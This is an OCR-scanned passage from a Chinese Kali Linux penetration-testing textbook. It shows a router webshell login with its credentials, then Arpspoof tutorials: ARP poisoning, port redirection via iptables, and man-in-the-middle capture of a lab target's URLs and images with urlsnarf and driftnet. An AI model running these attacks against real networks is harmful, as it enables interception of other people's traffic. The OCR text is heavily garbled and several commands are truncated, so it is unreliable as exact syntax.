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49.46 命令 行 界 面 


9.7 Ju d ES EH ER 436 


(4) 此 时 ， 在 该 界面 可 以 执行 一 些 查看 路 由 器 信息 的 命 信 ， 如 查看 进程 、 网 络 、 
或 者 直接 单 击 图 9.46 中 右 侧 栏 的 按钮 查看 相关 信息 。 在 该 界面 执 
行 命 分 时 ， 输入 用 户 名 和 密码 。 这 里 的 用 户 名 和 密码 是 Routerpwn 网 站 中 
Webshell 四 户 名 和 密码 (osteam 和 5up) 。 例 如 ， 单 击 “ 查 看 
网 络 " 按 钮 ， 将 显示 如 图 9.47 所 示 的 界面 。 
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ARS osteam TES 
Lt-& | 下 一 条 
Ih = 3r Ed 
ifconfig - TL " 
brü Link encap:iEthernet  HWaddr G6C:E8:7T3:F8: X2 :CU 


inet addr:192.168.0.1 Beast:192.168.0.255 Kask:255. 255. 255.0 
UP BROADCAST RUNNIKM; MULTICAST  NMTU:1500 Metric:1 

RE packetz:2218TT1601 errors:0 dropped:0 overruns:0 frame:0 

TÉ packets: 244867896 errors:0 dropped:0 overruns:Ü carrier:0 
collisions: 0 txqueuelen:ü 

RE brtes: 1780662856 (1.6 GiB) TX bytez:2348209445 (2.1 GiB) 


ethü Link encap:Ethernet  HWaddr 00:03: TF:FF:FF:FF 
UP BROADCAST RUNNING MULTICAST  MIU:1500 Metric:] 
RE packetz:31374498 errorz:Ü0 dropped:36002 overrung:0 frame:0 
TÉ packets: 26320786 errors:0 dropped:l overruns:9613 carrier:Ü 
collisions:0 txqueuelen: 900 查看 进程 
RE bytes: 1942057706 (1.8 GiB) TX bytes: 11357624415 (1.0 GiB) 


Hohe 

eth). | Link encap:Ethernet  HWaddr 6C:E8:73:F9:30:C0 

UP BROADCAST RUNNING MULTICAST NTU:1500 Metric:! 查看 路 由 

RE packets: 221878995 errorz:Ü dropped:0 overrunz:Ü frame:0 

TE packets: 244867896 errors:0 dropped:0 overruns:0 carrier:0 查看 NAT 

collisions:0 txqueuelen: 0 

RE bytes: 2668220808 (2.4 GiB) TX bytes: 3327681029 (3.0 GiB) EST 
ethü.2 Link encap:Ethernet  HWaddr GC:EB: T3:F9: X:CIl Bart 

UP BROADCAST RUNNING MULTICAST  MTU:1500 BMetric:! 

RE packeta: 244953222 errors:Ü dropped:0 overruns:0 frame: 0 BOA 

TE packets: 217660508 errorz:Ü dropped:0 overruns:0 carrier:0 | z 





图 9.47 路 由 器 的 网 络 连接 信息 


(5) 从 该 界面 可 以 看 到 路 由 器 中 ， 所 有 连接 的 网 络 接口 信息 ， 如 接口 的 IP 地 址 、 
MAC 地 址 和 传输 速率 等 。 如 果 想 要 通过 执行 命令 查 看 ， 则 在 指令 框 中 输入 ifconfig 命 
令 。 然 后 单 击发 送 "按钮 ， 如 图 9.48 所 示 。 
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用 户 名 osteam EX 
上 一 条 | 下 一 条 
his config |o EHE 青空 pu 


图 9.48 运行 命 分 查看 网 络 信息 
(6) 在 该 界面 单 击 " 发 送 "按钮 后 ， 输 出 的 信息 和 图 9.47 中 的 信息 一 样 。 


9.8 Arpspoof 工 具 


A 它 的 运行 不 会 影响 整个 网 络 的 通 
信 ， 该 工具 通过 蔡 换 传输 中 的 效 据 从 而 达到 对 目标 的 欺骗 。 本 节 将 介绍 Arpspoof 工 
具 的 使 用 。 


9.8.1 URL 流 量 操 纵 攻 击 


URL 流 量 操 作 非 党 类 似 于 中 间 人 攻击 ， p Vol ic iride ipei 该 
过 程 将 通过 ARP 注 入 实现 攻击 。 本 小 节 将 介绍 使 用 Arpspoof 工 具 实 现 URL 流 量 操纵 
攻击 。 俩 用 Arospo9i 工 具 详 现 URL 流 量 操作 攻击 ， 具体 操作 步骤 如 下 所 示 : 


(1) 开局 路 由 转发 功能 。 执 行 命 全 如 下 所 示 : 


root@kali:~# echo 1 >> /proc/sys/net/ipv4/ip_forward 


执行 以 上 命令 后 ， 没 有 任何 信息 输出 。 


(2) 启动 Arpspoof 注 入 攻击 目标 系统 。 攻 击 的 方法 是 攻击 者 (192.168.6. We = 
送 ARP 数 据 包 ， 以 欺骗 网 关 (192.168.6.1) 和 目标 系统 (192.168.6.101) 。 
首先 欺骗 目标 系统 ， 执 行 命令 如 下 所 示 : 


root@kali:~# arpspoof -i ethO -t 192.168.6.101 192.168.6.1 

50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168. 
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168. 
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168. 
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168. 
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168. 
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168. 
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168. 


oo000000 
BREE PRB BE 





俞 出 的 信息 显示 了 攻击 者 向 目标 主机 192.168.6.102 发 送 的 数据 包 。 其 中 
50:e5:49:eb:46:8d 表 示 攻 击 者 的 MAC 地 址 ; 19:21:3f:c3:e5 表 示 192.168.6.101 的 
MAC 地 址 。 当 以 上 过 程 攻 击 成 功 后 ， 目 标 主 机 192.168.6.101 给 网 天 192.168.6.1 发 
AHN, ADS «KPI 4 3:192.168.6.102. E, 


(3) 使 用 Arpspoof 注 入 攻击 网 和 天 。 执 行 命 分 如 下 所 示 : 


root@kali:~# arpspoof -i ethO -t 192.168.6.1 192.168.6.101 


50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6. 
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6. 
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6. 
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6. 
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6. 
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6. 











以 上 输出 信息 显示 了 攻击 者 向 网 关 192.168.6.1 发 送 的 数据 包 。 当 该 攻击 成 功 后 ， 网 
关 192.168.6.1 发 给 目标 系统 192.168.6.101 上 的 信息 发 送 到 攻击 者 主机 
192.168.6.102 上 。 


(4) 以 上 步骤 都 执行 成 功 后 ， 攻 击 者 融 相 当 于 控制 了 网 天 与 目标 主机 传输 的 数 
据 。 攻 击 者 可 以 通过 收 到 的 数据 ， 查 看 到 目标 系统 上 重要 的 信息 。 


为 了 验证 以 上 的 信息 ， 下 面 举 一 个 简单 的 例子 。 

【实例 9-7】 通过 使 用 Wireshark 抓 包 验 证 Arpspoof 工 具 的 攻击 。 具 体操 作 步 又 如 下 
所 示 。 

(1) 启动 Wireshark 工 具 。 在 Kali Linux 果 面 依次 选择 “应 用 程序 ”|Kali Linux|Top 10 
Security Tools|wireshark 命 分 ， 将 显示 如 图 9.49 所 示 的 界面 。 


F - - - 7 
The Wireshark Network Analyzer [Wireshark 1.10.2 (SVN Rev 51934 from /tr - | 


File Edit View Go Capture Analyze Statistics Telephony Tools Internals Help 
604mm xc b» 3 FS NS) ~ 
Filter: v | Expression... v 


The World's Most Popular Network Protoco| 


WIRESHARK Version 1.10.2 (SVN Rev 51934 from /trunk-1.10) 


Interface List Open 
— 


Live List of the capture interfaces Open a previously captured file 
(counts incoming packets) 







Open Recent: 
Start 


Choose one or more interfaces to capturefrom, then Start 


/root/targethost.pcap (22 kB) 
Kf! ethO 
E* | nflo 
: 9 Sample Captures 
ee any AM ! 





Ready to load or capture Mo... : Profile: Default 


9.49 Wireshark 启动 界面 
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(2) 在 该 界面 Start 下 面 ， 选 择 要 捕获 的 接口 。 这 里 选择 eth0， 然 后 单 击 Start 扫 


将 显示 如 9 50 所 示 的 界面。 


*ethO [Wireshark 1.10.2 (SVN Rev 51934 from /trunk-1.10)] bmi = ee 


File Edit View Go Capture Analyze Statistics Telephony Tools Internals Help 


o0 489 ijjmx*xqao»stt 





Sul 
Filter: v | Expression... w 
| No. Time Source Destination Protocol Ler 


1 2014-05-14 08:51:40.6933504 LIU T c 0:00; GE 


2 2014-05-14 08:51:41.693295( Vmware cO:00:08 Broadcast ARP 








0000 ff ff fft ff ff ff oO 50 56 cO OO OB OB O6 OO 01 ‘Vikan Mars 
0010 O08 OO 06 O4 OO Ol OO 50 56 cO OO O8 cO a8 29 Ol (xw E WR MERC ). 
0020 00 OO OO OO OO OO cO ag 29 O2 00 OO OO OO OO OO vasca. Mu kw d 


or File: “/tmp/wireshark_ pcapng- ethO...:...: Profile: Default 


49.50 抓 包 界面 
(3) 该 界面 可 以 对 Wireshark 进 行 相关 设置 及 启动、 停止 和 刷新 数据 包 。 


(4) 在 目标 系统 192.168.6.101 上 ping 网 关 192.168.6.1。 执行 命 舍 如 下 所 示 : 


C:\Users\Administrator>ping 192.168.6.1 


以 上 命令 执行 完 后 ， 到 Kali 下 查看 Wireshark 抓 取 的 数据 包 ， 如 图 9.51 所 示 。 





tath [Wireshark 1.10.2 (SVN Rev 51934 from /trunk-1.10]] Moni i e 
File Edit View Go Capture Analyze Statistics Telephony Tools internals Help 
Gdud Shee inge0nF &§ BSS ce ah@aese 
Filter: ~ Expression... 
Ha Time FE 中 Destinaticn Fraotecel  Lemncot)! lpt 


1 
















38 2814-85-14 87:15:38 102. 165.6.101 192.168.6.1 
31 1814-85-14 87:15:38 192.168.6.1 





ICHP 
192.168.6.181 THP 


74 Echo (ping) request idzOxOOOl, seqz13/3328, ttlz127 
74 Echo (ping) reply — idzOxOO01, seqz13/3328, ttl=64 




















— 33 004-059-104 87:15:38 192.168.6.1 — 192.168.6. 181 ICF 14 Echo (ping) reply idzOxOD01, seq=13/3328, ttl=53 
a ———— HÓ— —— ————— Ee —— ——— M —————— 

* Frame 28: 74 bytes on wire (592 bits), 74 bytes captured (592 bits) on interface Q 

^ Ethernet II, Sre: Elitegro 341:c3:à5 (00:19:21: 3f:¢3:605), Dat: Giga-Byt eb:a8:Bd (50:05:49: eb: 46: Bd] 

- Internet Protocol Version 4, Src: 192.168.6.101 (192.168.6.101), Ost: 192. 168.6. p (192. 168.6. 1} 

'" Internet DEDERE iiis esas 








DODO 50 e5 49 eb 46 Bd OO 19 21 Sf c3 e* O8 OO 49 OO  P.I.PF... !?....E. 
0010 00 3c 03 aa OO 00 BO Ol a9 BO cO að O6 BS cO að  .«...... ./...8.. 
DO20 öö 01 08 O0 4d 4e OO Ol öö Od 61 62 63 6465 66 — ....MN.. ..abcdef 
0030 67 68 69 Ga Gb öc 6d Ge Gf 70 71 72 73 74 75 76 — ghijklm opqrstuv 


OU rie "J/tmpiwireshark. pcapng. etho Packets: 83. Displayed: 83 (100.0%) - Dropped: O (.. - Profile: Default 


图 9.51 捕获 的 数据 包 
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440 


(5) 该 界面 显示 了 192.168.6.101 与 192.168.6.1 之 间 数 据 传 输 的 过 程 。 其 中 传输 整 
个 过 程 的 编号 为 28-33，28-30 是 一 个 请 求 数 据 包 过 程 ，31-33 是 目标 响应 效 据 包 过 
程 。 下 面 详细 分 析 捕 获 的 数据 包 。 


28 : 表示 192.168.6.101 (JR) 向 192.168.6.1 (目标 ) 发 送 ping 请 求 。 

29 : 表示 192.168.6.102 将 192.168.6.101 的 数据 包 进 行 转 发 。 

30 : 表示 192.168.6.102 将 转发 后 的 数据 包 ， 有 再 向 192.168.6.1 发 送 请 求 。 

: 表示 目标 主机 192.168.6.1 响 应 192.168.6.101 的 请 求 。 

32 : 表示 该 响应 被 发 送 到 192.168.6.102 上 ， 此 时 该 主机 转发 到 192.168.6.1。 
33 : 目标 主机 192.168.6.1 将 转发 的 数据 发 送 给 192.168.6.101 上 。 


© o o o Ọ @ 
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9.8.2 端口 重 定向 攻击 


端口 重 定向 又 叫 端 口 转发 或 端口 映射 。 端 口 重 定向 接收 到 一 个 端口 数据 包 的 过 程 
(如 80 端 口 ) ， 并 且 重 定向 它 的 流量 到 不 同 的 痕 口 《如 8080) 。 实 现 这 类 型 攻击 的 
好 处 就 是 可 以 无 止境 的 ， 因 为 可 以 随 着 它 重 定向 安全 的 端口 到 未 加 密 端 口 ， 重 定向 
流量 到 指定 设备 的 一 个 特定 痛 口 上 。 本 小 节 将 介绍 使 用 Arpspoof 实 现 痛 口 重 定 同 攻 
击 。 使 用 Arpspoof 实 现 端口 重 定向 攻击 。 具 体操 作 步 又 如 下 所 示 。 


(1) 开启 路 由 转发 攻击 。 执 行 命令 如 下 所 示 : 


root@kali:~# echo 1 >> /proc/sys/net/ipv4/ip_forward 


(2) 启动 Arpspoof 工 具 注 入 流量 到 默认 网 络 。 例 如 ， 本 例 中 的 默认 网 关 地 址 为 
192.168.6.1。 执 行 命 爷 如 下 所 示 : 


root@kali:~# arpspoof -i ethO 192.168.6.1 


在 Kali Linux 上 执行 以 上 命令 后 ， 没 有 任何 输出 信息 。 这 是 Kali 1.0.6 上 的 一 个 bug， 
因为 在 该 系统 中 dsniff 软 件 包 的 版 本 是 dsniff-2.4b1+debian-22。 执 行 arpspoof 命 兮 
不 指定 目标 系统 时 ， 只 有 在 dsniff 软 件 包 为 dsniff-2.4b1+debian-21.1 上 才 可 正常 运 
行 。 

(3) 添加 一 条 痛 口 重 定向 的 防火 墙 规则 。 执 行 命 分 如 下 所 示 : 


root@kali:~# iptables -t nat -A PREROUTING -p tcp --destination-poi 
a] O —— —— 77 
执行 以 上 命令 后 ， 没 有 任何 输出 。 


以 上 设置 成 功 后 ， 当 用 户 向 网 关 192.168.6.1 的 80 端 口 发 送 请求 时 ， 将 会 被 转发 为 
8080 端 口 发 送 到 攻击 者 主机 上 。 





9.8.3 捕获 并 监视 无 线 网 络 效 据 


使 用 中 间 人 攻击 的 方法 ， 可 以 使 Kali Linux 操 作 系 统 处 在 目标 主机 和 路 由 器 之 间 。 这 
样 ， 用 户 就 可 以 捕获 来 自 目 标 主机 的 所 有 数据 。 本 小 节 将 介绍 通过 使 用 Arpspoof 工 


具 实 施 中 间 人 攻击 ， 进 而 捕获 并 监视 无 线 网 络 数据 。 


(1) 开 刻 路 由 器 转发 功能 。 执 行 命 分 如 下 所 示 : 


root@Kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward 


(2) 使 用 Arpspoof 命 邻 攻击 主机 。 执 行 命令 如 下 所 示 : 


root@kali: 
fa: 
fa: 
fa: 
fa: 
fa: 
fa: 
fa: 
fa: 
fa: 


Oooao0ao0o0qoo0o © © 
00000000 


C: 
129: 
129: 
:29 : 
:29 : 
:29 : 
29: 
:29 : 
:29 : 


29: 


arpsp 
O 
ES 
WS 
alfo 
[b 
ES 
5 
ES 
O 


0: 


CC 
O0000000 0 


oU 279 


: 29; 
: 29; 
: 29; 
: 29; 
: 29; 
: 29; 
: 29; 
:29 : 


a9: 
a9: 
a9: 
a9: 
a9: 
a9: 
a9: 
a9: 
a9: 


oof -i ethO -t 192. 

: 29: fc: 
FC: 
fc: 
fc: 
fc: 
fc : 
Fe: 
fc: 
fc: 


25 0806 
25 0806 
25 0806 
25 0806 
25 0806 
25 0806 
25 0806 
25 0806 
25 0806 


168.6.106 192. 
42: 


42: 
42: 
42: 
42: 
42: 
42: 
42: 
42: 


arp 
arp 
arp 
arp 
arp 
arp 
arp 
arp 
arp 


reply 
reply 
reply 
reply 
reply 
reply 
reply 
reply 
reply 


168. 
192. 
IZ r 
192. 
192. 
192. 
3 5/2 « 
1927 
IE) 
192. 


6.1 


168. 
168. 
168. 
168. 
168. 
168. 
168. 
168. 
168. 


o000000505705 
HÁBbBHBHHmBHHBHBH 


1S-é 
ls-i 
ls-i 
ls-i 
1S-é 
ls-i 
ls-i 
ls-i 
1S-é 





执行 以 上 命令 表示 告诉 192.168.6.106 (目标 主机 ) ， 网 关 的 MAC 地 址 是 
00:0c:29:7a:59:75 (攻击 主机 ) 。 当 目标 主机 收 到 该 消息 时 ， 将 会 修改 ARP 缓 存 示 
中 对 应 的 网 天 ARP 条 目 。 执 行 以 上 命令 后 ， 不 会 目 动 分 止 。 如 果 不 需要 攻击 时 ， 按 
下 Ctrlt+C 组 合 键 停止 攻击 。 


(3) 查看 目标 主机 访问 URL 地 址 的 信息 。 执 行 命令 如 下 所 示 : 


root@kali:~# urlsnarf -i ethO 


urlsnarf: listening on ethO [tcp port 80 or port 8080 or port 3128 
192.168.6.106 - - [16/Ju1/2014:13:12:30 +0800] "GET http://192.168' 
192.168.6.106 - - [16/Ju1/2014:13:12:30 +0800] "GET http://192.168' 
192.168.6.106 - - [16/Ju1/2014:13:12:30 +0800] "GET http://192.168' 
192.168.6.106 - - [16/Ju1/2014:13:12:33 +0800] "GET http://192.168' 
192.168.6.106 - - [16/Jul/2014:13:12:37 +0800] "GET http://192.168' 
192.168.6.106 - - [16/Ju1/2014:13:12:37 +0800] "POST http://192.168 
192.168.6.106 - - [16/Ju1/2014:13:12:37 +0800] "POST http://192.16t 
192.168.6.106 - - [16/Ju1/2014:13:12:37 +0800] "POST http://192.16t 
192.168.6.106 - - [16/Ju1/2014:13:12:37 +0800] "POST http://192.16t 
| EES 


以 上 输出 的 信息 显示 了 目标 主机 访问 互联 网 的 信息 。 


(4) 用 户 还 可 以 使 用 Driftnet 工 具 ， 


4] : 
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root@kali:~# driftnet -i ethO 


执行 以 上 命 分 后 ， 将 会 打开 一 个 窗口 。 当 目标 主机 访问 到 网 页 中 有 图 片 时 ， 将 会 在 


该 窗口 中 显示 。 


(5) 现在 到 目标 主机 上 ， 访 问 互 联网 以 产生 捕获 信息 。 例 如 ， 随 便 在 目标 主机 上 
通过 浏览 器 访问 某 个 网 页 ， 攻 击 主 机 将 显示 如 图 9.52 所 示 的 界面 。 





driftnet 


e Pietat AE BS Ri Ls 
CITIES 





图 9.52 目标 主机 访问 的 图 片 


(6) 该 界面 显示 了 目标 主机 上 访问 的 所 有 图 片 。 现 在 用 户 可 以 通过 操 击 图 9.52 中 
的 任何 一 张 图 片 ， 该 图 片 籽 被 保存 到 Kali 主 机 上 。 此 时 driftnet 命 全 下 ， 将 会 出 现 如 
下 所 示 的 信息 ! 


root@kali:~# driftnet -i ethO 


driftnet: 
driftnet: 
driftnet: 
driftnet: 
driftnet: 
driftnet: 


saving 
saving 
saving 
saving 
saving 
saving 


"/tmp/drifnet-YbOzig/driftnet-53c9d45c168e1241f 
"/tmp/drifnet-YbOzig/driftnet-53c9d45c168e1241f 
"/tmp/drifnet-YbOzig/driftnet-53c9d4ca5d888a08 
"/tmp/drifnet-YbOzig/driftnet-53c9d4d92a6de806 
"/tmp/drifnet-YbOzig/driftnet-53c9d4d92a6de806 
"/tmp/drifnet-YbOzig/driftnet-53c9d5351a9a9e69 


. pne 
. pn« 
. Jp« 
. pn« 
. pn« 
. pnt 


Ei — 3 


从 上 面 可 以 看 到 ， 保 存 了 driftnet 捕 获 到 的 7 张 图 片 。 其 文件 名 分 别 为 driftnet-*.png,， 
并 且 这 些 文件 默认 保存 当前 目录 下 。 


(7) 用 户 可 以 使 用 Linux 目 带 的 图 像 查 看 器 查看 ， 如 图 9.53 所 示 。 





driftnet-4./peg 
EHA () 编辑 {EE) 查看 (V) 转 到 (G) WEAH) 


| c 
i i 


driftnet-4 jpeg 
宽度 : 


121 像素 


p al dd Lad LaSI. 1] A $ 3241. 15 
E paas La taal Lae 
文件 大 小 ; 


11.1 KB 


1 x 75K 11.1 KB 400% 





图 9.53 捕获 的 图 片 


(8) 该 界面 显示 的 是 第 四 张 图 片 。 用 户 可 以 通过 单 击 “ 下 一 张 "或 "上 一 张 "按钮 ， 切 
换 捕 获 到 的 图 片 。 


